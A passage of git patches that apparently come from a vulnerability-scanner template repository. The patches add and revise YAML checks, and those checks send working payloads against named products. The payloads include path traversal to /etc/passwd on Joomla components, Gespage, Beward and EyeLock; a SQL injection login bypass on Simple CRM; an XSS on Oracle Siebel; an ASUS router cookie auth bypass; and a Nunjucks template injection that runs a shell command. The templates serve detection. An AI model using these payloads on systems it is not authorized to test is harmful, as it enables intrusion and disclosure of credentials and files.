arbitrary local files via directory traversal sequences in the img parameter. + reference: | + - https://www.exploit-db.com/exploits/6817 + - https://www.cvedetails.com/cve/CVE-2008-6172 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 168140eef57cea4f35789cd6afb6dc755900909a Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 16 Aug 2021 06:28:46 +0700 Subject: [PATCH 1651/4083] Create CVE-2010-0943.yaml --- cves/2010/CVE-2010-0943.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-0943.yaml diff --git a/cves/2010/CVE-2010-0943.yaml b/cves/2010/CVE-2010-0943.yaml new file mode 100644 index 0000000000..26277c276e --- /dev/null +++ b/cves/2010/CVE-2010-0943.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-0943 + +info: + name: Joomla! Component com_jashowcase - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. + reference: | + - https://www.exploit-db.com/exploits/11090 + - https://www.cvedetails.com/cve/CVE-2010-0943 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From fa8c120f90b4f0c5809792486fa57137b5685e77 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 16 Aug 2021 06:47:24 +0700 Subject: [PATCH 1652/4083] Create CVE-2021-33807.yaml --- cves/2021/CVE-2021-33807.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2021/CVE-2021-33807.yaml diff --git a/cves/2021/CVE-2021-33807.yaml b/cves/2021/CVE-2021-33807.yaml new file mode 100644 index 0000000000..ea8b35a3b7 --- /dev/null +++ b/cves/2021/CVE-2021-33807.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-33807 + +info: + name: Cartadis Gespage through 8.2.1 - Directory Traversal + author: daffainfo + severity: high + description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData. + reference: | + - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807 + tags: cve,cve2021,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From b426441cf44bac3fbe8f9b60fa5c06a5055147df Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 16 Aug 2021 06:47:56 +0700 Subject: [PATCH 1653/4083] Update CVE-2021-33807.yaml --- cves/2021/CVE-2021-33807.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-33807.yaml b/cves/2021/CVE-2021-33807.yaml index ea8b35a3b7..f021e91be6 100644 --- a/cves/2021/CVE-2021-33807.yaml +++ b/cves/2021/CVE-2021-33807.yaml @@ -1,7 +1,7 @@ id: CVE-2021-33807 info: - name: Cartadis Gespage through 8.2.1 - Directory Traversal + name: Cartadis Gespage 8.2.1 - Directory Traversal author: daffainfo severity: high description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData. From 272dec095d3508373eecfe5c0f4a063a7d9718fa Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 13:55:31 +0530 Subject: [PATCH 1654/4083] Update CVE-2021-33807.yaml --- cves/2021/CVE-2021-33807.yaml | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-33807.yaml b/cves/2021/CVE-2021-33807.yaml index f021e91be6..a53d190db8 100644 --- a/cves/2021/CVE-2021-33807.yaml +++ b/cves/2021/CVE-2021-33807.yaml @@ -13,14 +13,20 @@ info: requests: - method: GET path: - - "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log" matchers-condition: and matchers: - - type: regex - regex: - - "root:.*:0:0" + - type: word + words: + - "NetpDoDomainJoin:" + part: body + + - type: word + words: + - "application/octet-stream" + part: header - type: status status: From 10640742dbb016d08ae98d3e31e2d94946e92397 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 14:01:20 +0530 Subject: [PATCH 1655/4083] Update CVE-2008-6172.yaml --- cves/2008/CVE-2008-6172.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2008/CVE-2008-6172.yaml b/cves/2008/CVE-2008-6172.yaml index b0554f0fe8..f209594c78 100644 --- a/cves/2008/CVE-2008-6172.yaml +++ b/cves/2008/CVE-2008-6172.yaml @@ -8,7 +8,7 @@ info: reference: | - https://www.exploit-db.com/exploits/6817 - https://www.cvedetails.com/cve/CVE-2008-6172 - tags: cve,cve2010,joomla,lfi + tags: cve,cve2008,joomla,lfi requests: - method: GET From 2a448b52db4251d848c506c77a1e0043249ad20d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 14:03:09 +0530 Subject: [PATCH 1656/4083] Update simple-crm-sql-injection.yaml --- vulnerabilities/simplecrm/simple-crm-sql-injection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml index a0924f1199..324f7ae4d8 100644 --- a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml +++ b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml @@ -29,5 +29,5 @@ requests: part: body - type: word words: - - "text/html" + - "text/html" part: header From bd865a06157d6c7e820b11746efd48b6e420be89 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 14:03:41 +0530 Subject: [PATCH 1657/4083] Update simple-crm-sql-injection.yaml --- vulnerabilities/simplecrm/simple-crm-sql-injection.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml index 324f7ae4d8..129d081da4 100644 --- a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml +++ b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml @@ -2,10 +2,10 @@ id: simple-crm-sql-injection info: name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass - reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt author: geeknik severity: critical - tags: sqli,bypass,simplecrm + reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt + tags: sqli,simplecrm,auth-bypass requests: - method: POST From 2875be2d8290b6f1d5db15a9f9a4a299af621896 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 14:06:18 +0530 Subject: [PATCH 1658/4083] Update simple-crm-sql-injection.yaml --- vulnerabilities/simplecrm/simple-crm-sql-injection.yaml | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml index 129d081da4..9247d17e78 100644 --- a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml +++ b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml @@ -3,7 +3,7 @@ id: simple-crm-sql-injection info: name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass author: geeknik - severity: critical + severity: high reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt tags: sqli,simplecrm,auth-bypass @@ -13,20 +13,17 @@ requests: - "{{BaseURL}}/scrm/crm/admin" body: "email='+or+2>1+--+&password=&login=" - - method: POST - path: - - "{{BaseURL}}/crm/admin" - body: "email='+or+2>1+--+&password=&login=" - matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "" part: body + - type: word words: - "text/html" From 610924d55bea851db92b917e429c997b8e290ee9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 14:12:49 +0530 Subject: [PATCH 1659/4083] Update oracle-siebel-xss.yaml --- vulnerabilities/oracle/oracle-siebel-xss.yaml | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/oracle/oracle-siebel-xss.yaml b/vulnerabilities/oracle/oracle-siebel-xss.yaml index e3a186b898..19e3bc099e 100644 --- a/vulnerabilities/oracle/oracle-siebel-xss.yaml +++ b/vulnerabilities/oracle/oracle-siebel-xss.yaml @@ -1,22 +1,28 @@ id: oracle-siebel-xss info: - name: Oracle Siebel XSS + name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability author: dhiyaneshDK severity: medium reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html - tags: xss + tags: xss,oracle requests: - method: GET path: - - '{{BaseURL}}/loyalty_enu/start.swe/%3E%22%3E%3Cscript%3Ealert("XSS")%3C/script%3E' + - '{{BaseURL}}/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - 'XSS' + - '' + + - type: word + part: header + words: + - text/html + - type: status status: - 200 From d8ceb92821a5a766cec0aa8bafdb0ba57a7b3bcf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 14:20:55 +0530 Subject: [PATCH 1660/4083] Update cisco-smi-detect.yaml --- network/cisco-smi-detect.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/network/cisco-smi-detect.yaml b/network/cisco-smi-detect.yaml index 1c81ee8491..bbbc223aa2 100644 --- a/network/cisco-smi-detect.yaml +++ b/network/cisco-smi-detect.yaml @@ -4,17 +4,17 @@ info: name: Cisco Smart Install Endpoints Detect author: dwisiswant0 severity: info + description: | + This template attempts to connect to the specified Cisco Smart Install port + and determines if it speaks the Smart Install Protocol. Exposure of SMI + to untrusted networks can allow complete compromise of the switch. references: | - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi - https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L53 - https://github.com/Sab0tag3d/SIET - description: | - This template attempts to connect to the specified Cisco Smart Install port - and determines if it speaks the Smart Install Protocol. Exposure of SMI - to untrusted networks can allow complete compromise of the switch. - tags: network,cisco,smi,endpoint,exposure + tags: network,cisco,smi,exposure network: - inputs: From 3ac7a756fc29a917cc66e439cdae4eb7efc9ab59 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 16 Aug 2021 15:37:07 +0530 Subject: [PATCH 1661/4083] Added woocommerce-pdf-invoice-listing --- .../wp-woocommerce-pdf-invoice-listing.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml diff --git a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml new file mode 100644 index 0000000000..6ca5d17599 --- /dev/null +++ b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml @@ -0,0 +1,31 @@ +id: wp-woocommerce-pdf-invoice-listing + +info: + name: WordPress Upload Fuzzing + author: mohammedsaneem,sec_hawk + severity: medium + description: Allows attacker to view sensitive information such as company invoices + reference: | + - https://twitter.com/sec_hawk/status/1426984595094913025?s=21 + - https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml + - https://woocommerce.com/products/pdf-invoices/ + tags: wordpress,listing,exposure + +requests: + + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/pdf-invoices/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of /wp-content/uploads/pdf-invoices" + - "Parent Directory" + - ".pdf" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From f0acc877a8bd8e8c10f3046552e8f011a21627d2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 15:50:28 +0530 Subject: [PATCH 1662/4083] Update CVE-2019-16313.yaml --- cves/2019/CVE-2019-16313.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-16313.yaml b/cves/2019/CVE-2019-16313.yaml index 5fee4615b0..4acbe787fc 100644 --- a/cves/2019/CVE-2019-16313.yaml +++ b/cves/2019/CVE-2019-16313.yaml @@ -4,9 +4,11 @@ info: name: ifw8 Router ROM v4.31 allows credential disclosure author: pikpikcu severity: high + description: ifw8 Router ROM v4.31 allows credential disclosure by reading the action/usermanager.htm HTML source code. reference: | + - https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md - https://nvd.nist.gov/vuln/detail/CVE-2019-16313 - tags: cve,cve2019,tvt,lfi + tags: cve,cve2019,lfi requests: - method: GET @@ -29,5 +31,6 @@ requests: extractors: - type: regex part: body + group: 1 regex: - - 'pwd : "([A-Za-z0-9=]+)",' + - '\*\*\*\*\*\*<\/td>' From 232b187a4054a3e4c72b248b9ae61bf389a93532 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 16:11:44 +0530 Subject: [PATCH 1663/4083] Create beward-ipcamera-disclosure.yaml --- .../other/beward-ipcamera-disclosure.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/beward-ipcamera-disclosure.yaml diff --git a/vulnerabilities/other/beward-ipcamera-disclosure.yaml b/vulnerabilities/other/beward-ipcamera-disclosure.yaml new file mode 100644 index 0000000000..7ecf62802d --- /dev/null +++ b/vulnerabilities/other/beward-ipcamera-disclosure.yaml @@ -0,0 +1,26 @@ +id: beward-ipcamera-disclosure + +info: + name: BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure + description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php + author: geeknik + severity: high + tags: beward,iot,camera,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/operator/fileread?READ.filePath=/etc/passwd" + headers: + Authorization: "Basic YWRtaW46YWRtaW4=" + + matchers-condition: and + matchers: + - type: regex + regex: + - 'root:[x*]:0:0:' + condition: or + - type: status + status: + - 200 From c6927262eba8862cdada0ff3ed20ac68b08eef72 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 16:12:45 +0530 Subject: [PATCH 1664/4083] Create eyelock-nano-lfd.yaml --- vulnerabilities/other/eyelock-nano-lfd.yaml | 24 +++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 vulnerabilities/other/eyelock-nano-lfd.yaml diff --git a/vulnerabilities/other/eyelock-nano-lfd.yaml b/vulnerabilities/other/eyelock-nano-lfd.yaml new file mode 100644 index 0000000000..2a9c255fd8 --- /dev/null +++ b/vulnerabilities/other/eyelock-nano-lfd.yaml @@ -0,0 +1,24 @@ +id: eyelock-nano-lfd + +info: + name: EyeLock nano NXT 3.5 - Local File Disclosure + description: + author: geeknik + reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt + severity: high + tags: eyelock,lfd,traversal,iot,biometrics + +requests: + - method: GET + path: + - "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" + part: body From 451823f88736849026d17b48c65ed219455c2601 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 16:13:27 +0530 Subject: [PATCH 1665/4083] Create node-nunjucks-ssti.yaml --- vulnerabilities/other/node-nunjucks-ssti.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 vulnerabilities/other/node-nunjucks-ssti.yaml diff --git a/vulnerabilities/other/node-nunjucks-ssti.yaml b/vulnerabilities/other/node-nunjucks-ssti.yaml new file mode 100644 index 0000000000..8cf03e6983 --- /dev/null +++ b/vulnerabilities/other/node-nunjucks-ssti.yaml @@ -0,0 +1,23 @@ +id: node-nunjucks-ssti + +info: + name: Node Nunjucks SSTI + description: Nunjucks is a template engine for by Jinja2 used to develop web applications on Node.js web frameworks as Express or Connect. + reference: https://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine + author: geeknik + severity: high + tags: node,nunjucks,ssti + +requests: + - method: GET + path: + - "{{BaseURL}}/page?name={{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + - type: status + status: + - 200 From 4e498a647851507b6adadc6379c5211c2698cd8c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 16:14:02 +0530 Subject: [PATCH 1666/4083] Create pmb-directory-traversal.yaml --- .../other/pmb-directory-traversal.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 vulnerabilities/other/pmb-directory-traversal.yaml diff --git a/vulnerabilities/other/pmb-directory-traversal.yaml b/vulnerabilities/other/pmb-directory-traversal.yaml new file mode 100644 index 0000000000..8770d69cab --- /dev/null +++ b/vulnerabilities/other/pmb-directory-traversal.yaml @@ -0,0 +1,22 @@ +id: pmb-directory-traversal + +info: + name: PMB 5.6 Directory Traversal + reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html + author: geeknik + severity: medium + +requests: + - method: GET + path: + - "{{BaseURL}}/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik" + - "{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + - type: status + status: + - 200 From af4f29ab03381e9f3890ef1e7dbf5687bbfae19b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 16:37:34 +0530 Subject: [PATCH 1667/4083] Update beward-ipcamera-disclosure.yaml --- vulnerabilities/other/beward-ipcamera-disclosure.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/other/beward-ipcamera-disclosure.yaml b/vulnerabilities/other/beward-ipcamera-disclosure.yaml index 7ecf62802d..caeb3dd6c3 100644 --- a/vulnerabilities/other/beward-ipcamera-disclosure.yaml +++ b/vulnerabilities/other/beward-ipcamera-disclosure.yaml @@ -2,11 +2,13 @@ id: beward-ipcamera-disclosure info: name: BEWARD N100 H.264 VGA IP Camera M2.1.6 Arbitrary File Disclosure - description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php author: geeknik severity: high - tags: beward,iot,camera,disclosure + description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API. + reference: | + - https://www.exploit-db.com/exploits/46320 + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php + tags: iot,camera,disclosure requests: - method: GET @@ -20,7 +22,7 @@ requests: - type: regex regex: - 'root:[x*]:0:0:' - condition: or + - type: status status: - 200 From d3a379e11239fcf05ad7e59e4ffed38cfdb3ef43 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 16:40:42 +0530 Subject: [PATCH 1668/4083] Update eyelock-nano-lfd.yaml --- vulnerabilities/other/eyelock-nano-lfd.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/eyelock-nano-lfd.yaml b/vulnerabilities/other/eyelock-nano-lfd.yaml index 2a9c255fd8..7e05dfc26c 100644 --- a/vulnerabilities/other/eyelock-nano-lfd.yaml +++ b/vulnerabilities/other/eyelock-nano-lfd.yaml @@ -2,11 +2,11 @@ id: eyelock-nano-lfd info: name: EyeLock nano NXT 3.5 - Local File Disclosure - description: author: geeknik - reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt severity: high - tags: eyelock,lfd,traversal,iot,biometrics + description: nano NXT suffers from a file disclosure vulnerability when input passed thru the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. + reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt + tags: iot,lfi,eyelock requests: - method: GET From d45887f9f9083c9ca30efbc3f503de79387c1cbd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 16:41:58 +0530 Subject: [PATCH 1669/4083] Delete node-nunjucks-ssti.yaml --- vulnerabilities/other/node-nunjucks-ssti.yaml | 23 ------------------- 1 file changed, 23 deletions(-) delete mode 100644 vulnerabilities/other/node-nunjucks-ssti.yaml diff --git a/vulnerabilities/other/node-nunjucks-ssti.yaml b/vulnerabilities/other/node-nunjucks-ssti.yaml deleted file mode 100644 index 8cf03e6983..0000000000 --- a/vulnerabilities/other/node-nunjucks-ssti.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: node-nunjucks-ssti - -info: - name: Node Nunjucks SSTI - description: Nunjucks is a template engine for by Jinja2 used to develop web applications on Node.js web frameworks as Express or Connect. - reference: https://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine - author: geeknik - severity: high - tags: node,nunjucks,ssti - -requests: - - method: GET - path: - - "{{BaseURL}}/page?name={{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\")()}}" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - - type: status - status: - - 200 From c11328da0b168bdc9d5c4bf5ba76bcc5c7e771e3 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 16 Aug 2021 20:13:22 +0900 Subject: [PATCH 1670/4083] Create CVE-2021-32030.yaml The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations. Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-32030.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2021/CVE-2021-32030.yaml diff --git a/cves/2021/CVE-2021-32030.yaml b/cves/2021/CVE-2021-32030.yaml new file mode 100644 index 0000000000..95ec6c5a05 --- /dev/null +++ b/cves/2021/CVE-2021-32030.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-32030 + +info: + name: ASUS GT-AC2900 - Authentication Bypass + description: The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations. + author: gy741 + severity: high + reference: | + - https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass + tags: cve,cve2021,asus,auth-bypass,router + +requests: + - raw: + - | + GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1 + Host: {{Hostname}} + User-Agent: asusrouter-- + Connection: close + Referer: {{BaseURL}} + Cookie: asus_token=\0Invalid; clickedItem_tab=0 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - application/json + + - type: word + words: + - "get_cfg_clientlist" + - "alias" + - "model_name" + condition: and From 970bdb3ac7bbf566aa78584aa3fb80d6549cc5d4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 16 Aug 2021 16:43:47 +0530 Subject: [PATCH 1671/4083] Update pmb-directory-traversal.yaml --- vulnerabilities/other/pmb-directory-traversal.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/pmb-directory-traversal.yaml b/vulnerabilities/other/pmb-directory-traversal.yaml index 8770d69cab..f4fe3c5f78 100644 --- a/vulnerabilities/other/pmb-directory-traversal.yaml +++ b/vulnerabilities/other/pmb-directory-traversal.yaml @@ -2,9 +2,12 @@ id: pmb-directory-traversal info: name: PMB 5.6 Directory Traversal - reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html author: geeknik severity: medium + description: The PMB Gif Image is not sanitizing the 'chemin', which leads to Local File Disclosure. + reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html + tags: lfi + requests: - method: GET @@ -17,6 +20,7 @@ requests: - type: regex regex: - "root:[x*]:0:0:" + - type: status status: - 200 From c281b66b1d3280c9a88bd4a3107700fb2fdc1286 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Mon, 16 Aug 2021 18:27:13 +0700 Subject: [PATCH 1672/4083] Rename to exposure instead --- ...{cisco-smi-detect.yaml => cisco-smi-exposure.yaml} | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) rename network/{cisco-smi-detect.yaml => cisco-smi-exposure.yaml} (71%) diff --git a/network/cisco-smi-detect.yaml b/network/cisco-smi-exposure.yaml similarity index 71% rename from network/cisco-smi-detect.yaml rename to network/cisco-smi-exposure.yaml index bbbc223aa2..438ecd7920 100644 --- a/network/cisco-smi-detect.yaml +++ b/network/cisco-smi-exposure.yaml @@ -1,13 +1,14 @@ -id: cisco-smi-detect +id: cisco-smi-exposure info: - name: Cisco Smart Install Endpoints Detect + name: Cisco Smart Install Endpoints Exposure author: dwisiswant0 severity: info description: | - This template attempts to connect to the specified Cisco Smart Install port - and determines if it speaks the Smart Install Protocol. Exposure of SMI - to untrusted networks can allow complete compromise of the switch. + This template attempts & supports the detection part only by + connecting to the specified Cisco Smart Install port and determines + if it speaks the Smart Install Protocol. Exposure of SMI to + untrusted networks can allow complete compromise of the switch. references: | - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature From 4610ecb97bb56f5551eb85eb6e4f41b48d3d007e Mon Sep 17 00:00:00 2001 From: Mohamed Elbadry Date: Mon, 16 Aug 2021 18:01:41 +0200 Subject: [PATCH 1673/4083] Add files via upload --- takeovers/announcekit-takeover.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 takeovers/announcekit-takeover.yaml diff --git a/takeovers/announcekit-takeover.yaml b/takeovers/announcekit-takeover.yaml new file mode 100644 index 0000000000..cbbd7ad553 --- /dev/null +++ b/takeovers/announcekit-takeover.yaml @@ -0,0 +1,28 @@ +id: announcekit-tk + +info: + name: Announcekit Takeover Detection + author: melbadry9 + severity: high + tags: takeover,aws + reference: https://announcekit.app/docs/custom-host + +requests: + - method: GET + raw: + - | + GET / HTTP/2 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + + redirects: true + max-redirects: 1 + + matchers-condition: and + matchers: + - type: word + words: + - 'Error 404 - AnnounceKit' + + - type: status + status: + - 404 \ No newline at end of file From 5671e89f95a0b8ecf14b7e11e83c5f5edd1d821e Mon Sep 17 00:00:00 2001 From: Mohamed Elbadry Date: Mon, 16 Aug 2021 18:06:05 +0200 Subject: [PATCH 1674/4083] add announcekit-takeover.yaml --- takeovers/announcekit-takeover.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/takeovers/announcekit-takeover.yaml b/takeovers/announcekit-takeover.yaml index cbbd7ad553..4c1d94ede7 100644 --- a/takeovers/announcekit-takeover.yaml +++ b/takeovers/announcekit-takeover.yaml @@ -4,14 +4,16 @@ info: name: Announcekit Takeover Detection author: melbadry9 severity: high - tags: takeover,aws - reference: https://announcekit.app/docs/custom-host + tags: takeover + reference: | + - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit + - 